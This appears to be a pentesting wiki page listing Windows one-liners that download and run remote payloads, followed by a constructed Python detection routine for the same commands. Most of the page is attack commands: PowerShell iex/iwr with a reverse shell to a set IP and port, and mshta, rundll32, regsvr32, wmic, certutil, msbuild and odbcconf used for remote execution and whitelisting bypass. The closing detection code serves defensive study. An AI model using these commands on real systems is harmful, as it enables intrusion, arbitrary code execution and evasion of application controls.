# Oneliners for Code Execution

### PowerShell <a href="#bkmrk-powershell" id="bkmrk-powershell"></a>

```
powershell.exe iex (iwr http://172.16.100.211/Invoke-PowerT.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.211 -Port 443
```

```
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
```

But you can also call the payload directly from a WebDAV server:

```
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```

### Cmd <a href="#bkmrk-cmd" id="bkmrk-cmd"></a>

Check out the great work by Arno0x on the ***Invoke-EmbedInBatch.ps1*** script (*heavily inspired by @xorrior's work*); with it you can easily execute any binary, DLL or script:

{% embed url="<https://github.com/Arno0x/PowerShellScripts/blob/master/Invoke-EmbedInBatch.ps1>" %}

```
cmd.exe /k < \\webdavserver\folder\batchfile.txt
```

### Cscript/Wscript <a href="#bkmrk-cscript-2fwscript" id="bkmrk-cscript-2fwscript"></a>

```
cscript //E:jscript \\webdavserver\folder\payload.txt
```

### Mshta <a href="#bkmrk-mshta" id="bkmrk-mshta"></a>

```
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```

As seen in the Koadic framework, mshta accepts a URL as an argument and executes the HTA file it points to:

```
mshta http://webserver/payload.hta
```

### Rundll32 <a href="#bkmrk-rundll32" id="bkmrk-rundll32"></a>

{% tabs %}
{% tab title="UNC Path" %}

```
rundll32 \\webdavserver\folder\payload.dll,entrypoint
```

{% endtab %}

{% tab title="Jscript" %}

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```

{% endtab %}
{% endtabs %}

### Wmic <a href="#bkmrk-wmic" id="bkmrk-wmic"></a>

```
wmic os get /format:"https://webserver/payload.xsl"
```

### Regasm/Regsvc <a href="#bkmrk-regasm-2fregsvc" id="bkmrk-regasm-2fregsvc"></a>

Application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (*it can be written in .NET/C#*) that exposes the proper interfaces; you can then call it over WebDAV:

```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```

### Regsvr32 <a href="#bkmrk-regsvr32" id="bkmrk-regsvr32"></a>

Another one from @subTee. This one requires a slightly different *scriptlet* from the mshta one above. First option:

```
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```

Second option using UNC/WebDAV:

```
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```

### Odbcconf <a href="#bkmrk-odbcconf" id="bkmrk-odbcconf"></a>

Note that the DLL file doesn't need to have the *.dll* extension. It can be loaded over UNC/WebDAV:

```
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
```

### Msbuild <a href="#bkmrk-msbuild" id="bkmrk-msbuild"></a>

```
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
```

### Certutil <a href="#bkmrk-combining-some-comma" id="bkmrk-combining-some-comma"></a>

Great work by @subTee for discovering this:

```
certutil -urlcache -split -f http://webserver/payload payload
```

Now, combining several commands in one line, with InstallUtil.exe executing a specific DLL as the payload:

```
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```


This information was referenced from:

{% embed url="<https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code>" %}
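The one-liners above share a few command-line traits that a defender can alert on: a signed Windows binary being handed an http(s) URL or a `\\host\share` UNC path, or a script-engine prefix such as `javascript:` / `script:`. The following is an added example, not code from the original page or the referenced blog: a small Python triage routine that runs those patterns over constructed Sysmon-style process-creation records (the `SAMPLE_EVENTS` and `RULES` names and the sample events themselves are constructed for illustration).

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://webserver/payload.hta"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct")'},
    {"Image": r"C:\Windows\System32\wbem\wmic.exe",
     "CommandLine": 'wmic os get /format:"https://webserver/payload.xsl"'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://webserver/payload.b64 payload.b64"},
    {"Image": r"C:\Windows\System32\odbcconf.exe",
     "CommandLine": r"odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}"},
    # Benign look-alikes: a local DLL registration and a certificate check.
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\Program Files\Vendor\vendor.dll"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verify cert.cer"},
]

# (label, image name or None for any image, regex): each pattern keys on a URL or UNC path handed to a signed binary.
URL_OR_UNC = r"(https?://|\\\\[^\\\s]+\\)"
RULES = [
    ("regsvr32 scriptlet",   "regsvr32.exe", rf"/i:{URL_OR_UNC}.*scrobj\.dll"),
    ("mshta remote content", "mshta.exe",    rf"mshta\s+{URL_OR_UNC}|script:https?://"),
    ("rundll32 javascript",  "rundll32.exe", r"javascript:.*RunHTMLApplication"),
    ("wmic remote XSL",      "wmic.exe",     rf"/format:\W?{URL_OR_UNC}"),
    ("certutil download",    "certutil.exe", r"-urlcache\b.*-f\s+https?://"),
    ("odbcconf regsvr",      "odbcconf.exe", r"/a\s*\{regsvr\s"),
    ("UNC/WebDAV source",    None,           r"\\\\[^\\\s]+\\[^\s]+\\"),
]

def classify(event):
    """Return the labels of every rule that matches this process-creation event."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    hits = []
    for label, binary, pattern in RULES:
        if binary in (None, image) and re.search(pattern, event["CommandLine"], re.I):
            hits.append(label)
    return hits

def triage(events):
    """Map each flagged command line to its labels; events with no hits are dropped."""
    return {e["CommandLine"]: h for e in events if (h := classify(e))}
```

Because the rules pin each pattern to the image name, a URL in an unrelated process (a browser, a package manager) does not fire; only the UNC rule is image-agnostic, since a `\\host\share\` source is worth a look regardless of which binary loads it.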
